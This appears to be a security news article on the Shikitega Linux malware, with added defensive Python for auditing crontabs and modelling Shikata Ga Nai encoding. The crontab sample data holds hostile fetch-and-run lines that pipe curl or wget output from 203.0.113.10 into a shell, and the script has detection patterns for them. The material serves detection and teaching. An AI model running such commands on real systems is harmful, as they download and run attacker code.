Shikitega: New Malware Program Targeting Linux

AT&T Alien Labs has discovered a new Linux malware program targeting endpoints and IoT devices.
Usually, Linux malware targets servers and cloud instances. You know, where there’s big-time CPU horsepower to turn to cryptocurrency mining. Shikitega, however, also goes for the low-hanging fruit of desktops and IoT devices. Of course, it will happily attack servers as well. Like all malware, it’s an equal opportunity attacker.
Multistage Infection
According to AT&T Alien Labs, which discovered it, Shikitega comes in a multistage infection chain. The infection starts with a tiny (370 bytes) Executable and Linkable Format (ELF) file. In case you’ve forgotten, or you never knew: never download and run an unknown ELF file. It’s just asking for trouble.
Of course, you may not even know there’s such a minute file hiding inside a larger package. So, just like with Windows, be sure you know what’s in every package and where it came from before installing it.
Then, once in place, each module downloads and executes the next one. Besides fetching its successor, each module has its own specific task. These include downloading and executing Mettle, Metasploit’s native Meterpreter implant for Linux and embedded devices; hunting down and exploiting Linux vulnerabilities; and setting up persistence on the infected machine. It does this last part by running shell scripts that set up four crontabs: two for the currently logged-in user and the other two for root. If cron isn’t installed, it will attempt to install the package and start the cron service.
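Those four crontabs are the one piece of Shikitega that has to survive on disk, which makes them the cheapest place to look for it. The script below is an added example, not code from the Alien Labs report or from the malware: it parses crontab text, flags the download-and-execute, temp-directory, hidden-path and miner-name patterns that this kind of persistence stage tends to leave, and can be pointed at the live system. The sample crontabs, the 203.0.113.10 address, the file paths and the heuristics are all constructed for this example and are not published indicators.

```python
import glob
import re
import subprocess
import sys

# Constructed sample crontabs (made-up paths, URLs and names, not indicators
# from the AT&T Alien Labs report). Two of the entries carry the kind of
# download-and-execute and temp-dir persistence a Shikitega-style stage leaves.
SAMPLE_CRONTABS = {
    "user:alice": (
        "# m h dom mon dow command\n"
        "0 2 * * * /home/alice/bin/backup.sh\n"
        "*/5 * * * * /usr/bin/wget -q -O- http://203.0.113.10/x.sh | /bin/sh\n"
        "@reboot /tmp/.X11-unix/.cache/run >/dev/null 2>&1\n"
    ),
    "user:root": (
        "PATH=/usr/sbin:/usr/bin:/sbin:/bin\n"
        "17 * * * * cd / && run-parts --report /etc/cron.hourly\n"
        "* * * * * /bin/bash -c 'curl -s http://203.0.113.10/m | bash'\n"
        "@hourly /root/.config/xmrig --config=/root/.config/c.json\n"
    ),
}

# Heuristics written for this example (assumption: these are typical of
# download-and-execute cron persistence, not a published signature).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(/bin/)?(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/"), "binary in world-writable temp dir"),
    (re.compile(r"(^|\s)/[^ ]*/\.[^ /]+"), "hidden path component"),
    (re.compile(r"\b(xmrig|minerd|kdevtmpfsi)\b", re.I), "known miner name"),
]

# Either an @reboot/@hourly style keyword or five schedule fields, then the command.
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){5})(.*)$")


def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments, blanks and VAR= lines.
    For /etc/crontab and /etc/cron.d/* the user field is folded into the command,
    which is fine for pattern matching."""
    entries = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue
        m = CRON_LINE.match(s)
        if m:
            entries.append((m.group(1).strip(), m.group(2).strip()))
    return entries


def audit(crontabs):
    """crontabs: {owner: crontab text}. Returns (owner, schedule, command, reasons)
    for every entry that trips at least one heuristic, in crontab order."""
    findings = []
    for owner, text in crontabs.items():
        for schedule, command in parse_crontab(text):
            reasons = [why for pat, why in SUSPICIOUS if pat.search(command)]
            if reasons:
                findings.append((owner, schedule, command, reasons))
    return findings


def collect_live_crontabs():
    """Gather the caller's own crontab plus /etc/crontab and /etc/cron.d/*.
    Run as root and extend with `crontab -l -u <user>` to cover every account."""
    found = {}
    try:
        out = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
        if out.returncode == 0:
            found["user:self"] = out.stdout
    except FileNotFoundError:
        pass  # cron not installed; Shikitega's persistence stage would try to add it
    for path in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(path) as fh:
                found[path] = fh.read()
        except OSError:
            pass
    return found


if __name__ == "__main__":
    source = collect_live_crontabs() if "--live" in sys.argv else SAMPLE_CRONTABS
    for owner, sched, cmd, why in audit(source):
        print(f"[{owner}] {sched} :: {cmd}\n    -> {', '.join(why)}")
```

Run it with `--live` on a box you suspect; on the constructed sample it flags the two wget/curl pipelines, the hidden binary under /tmp, and the xmrig entry, and leaves the backup job and the stock run-parts line alone. Treat hits as leads, not verdicts: a legitimate cron job that fetches a script over HTTP will trip the first rule too, which is itself worth a conversation.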
Finally, it will try to download and execute a cryptominer and to grab root on your machine. It goes after root with exploits for CVE-2021-4034, aka PwnKit, in polkit’s pkexec, and CVE-2021-3493, an OverlayFS privilege-escalation flaw in Ubuntu kernels. If you’ve kept your Linux system up to date, which can be a problem if your IoT vendor hasn’t been doing its job, these exploits will fail.
Hides Its Payloads
Shikitega hides its payloads along the way by encoding them with Shikata Ga Nai, Metasploit’s polymorphic XOR additive-feedback encoder. Each stage runs the decoder loop on the next until the final shellcode payload is decoded and running, so a static signature written for one sample won’t match the next.
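To see why that defeats byte signatures but is not encryption, here is a small model of the XOR additive-feedback scheme in Python. This is an added example, not code from the Alien Labs report, from the malware, or from Metasploit: it keeps the arithmetic (XOR each 32-bit word with a running key, then add the decoded word into the key) and nothing else. The real Metasploit encoder also emits a randomised x86 decoder stub that locates itself and carries the initial key in a register; that stub is an assumption left out here. The sample payload and the `demo_polymorphism` helper are constructed for this example.

```python
import os
import struct

MASK = 0xFFFFFFFF


def _dwords(data):
    """Split bytes into little-endian 32-bit words, zero-padding the tail."""
    data += b"\x00" * (-len(data) % 4)
    return struct.unpack("<%dI" % (len(data) // 4), data)


def sgn_encode(payload, key):
    """XOR each word with the running key, then feed the plaintext word back
    into the key (mod 2**32). Simplified model of Shikata Ga Nai's arithmetic;
    the randomised decoder stub of the real encoder is not modelled here."""
    out = []
    for p in _dwords(payload):
        out.append(p ^ key)
        key = (key + p) & MASK
    return struct.pack("<%dI" % len(out), *out)


def sgn_decode(blob, key, length=None):
    """Mirror of the decoder loop: xor the word with the key, then add the
    freshly decoded word to the key. `length` trims the zero padding."""
    out = []
    for c in _dwords(blob):
        p = c ^ key
        out.append(p)
        key = (key + p) & MASK
    plain = struct.pack("<%dI" % len(out), *out)
    return plain if length is None else plain[:length]


def recover_key(blob, known_prefix):
    """Known-plaintext shortcut: the first encoded word XOR the first plaintext
    word (for an ELF stage, b'\\x7fELF') is the initial key, and with the key
    the whole blob decodes. Needs at least four known leading bytes."""
    (c0,) = struct.unpack("<I", blob[:4])
    (p0,) = struct.unpack("<I", known_prefix[:4].ljust(4, b"\x00"))
    return c0 ^ p0


def demo_polymorphism(payload, trials=5):
    """Encode the same payload under fresh random keys. Returns how many distinct
    encodings came out and whether any aligned 4-byte run of the plaintext
    survives verbatim in any encoding (it should not)."""
    encodings = {
        sgn_encode(payload, struct.unpack("<I", os.urandom(4))[0]) for _ in range(trials)
    }
    leaks = any(
        payload[i:i + 4] in enc
        for enc in encodings
        for i in range(0, len(payload) - 3, 4)
    )
    return len(encodings), leaks


if __name__ == "__main__":
    # Constructed stand-in for an encoded stage: an ELF magic plus filler bytes.
    payload = b"\x7fELF" + bytes(range(32))
    key = 0x12345678
    blob = sgn_encode(payload, key)
    print("encoded :", blob.hex())
    print("key back:", hex(recover_key(blob, b"\x7fELF")))
    print("decoded :", sgn_decode(blob, key, len(payload)))
    print("distinct encodings, plaintext leak:", demo_polymorphism(payload))
```

Two things follow for a defender. Five encodings of one payload share no bytes, so a signature on the encoded stage is useless; detection has to key on the decoder stub, on behaviour, or on the next stage once it is unpacked in memory. And because the key must be in the clear for the stub to run, an analyst with the dropper and a guess at the first four plaintext bytes recovers every stage with `recover_key`, no brute force needed.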
Next, it downloads and executes additional commands from its command and control (C&C) server. These are run in memory and aren’t stored on your device’s drive.
The point of all this is to turn your machine into a low-powered cryptominer. Specifically, it installs XMRig, a Monero miner.
Avoiding Shikitega
So, how do you keep from getting a bad case of Shikitega? Simple. Just do the basics: install security patches, keep backups, and never install unknown programs. You can also run anti-malware programs on your endpoints if you want a belt-and-suspenders approach to your security.
As always, you should be largely safe from Linux malware if you just practice good server security. The only real danger I see here is with IoT devices. All too often, IoT vendors do a lousy job of keeping their embedded operating systems up to date with security patches. If that’s the case with your devices, I suggest finding replacement gear from a vendor that takes security seriously. Instances of Linux malware are, unfortunately, increasing rapidly.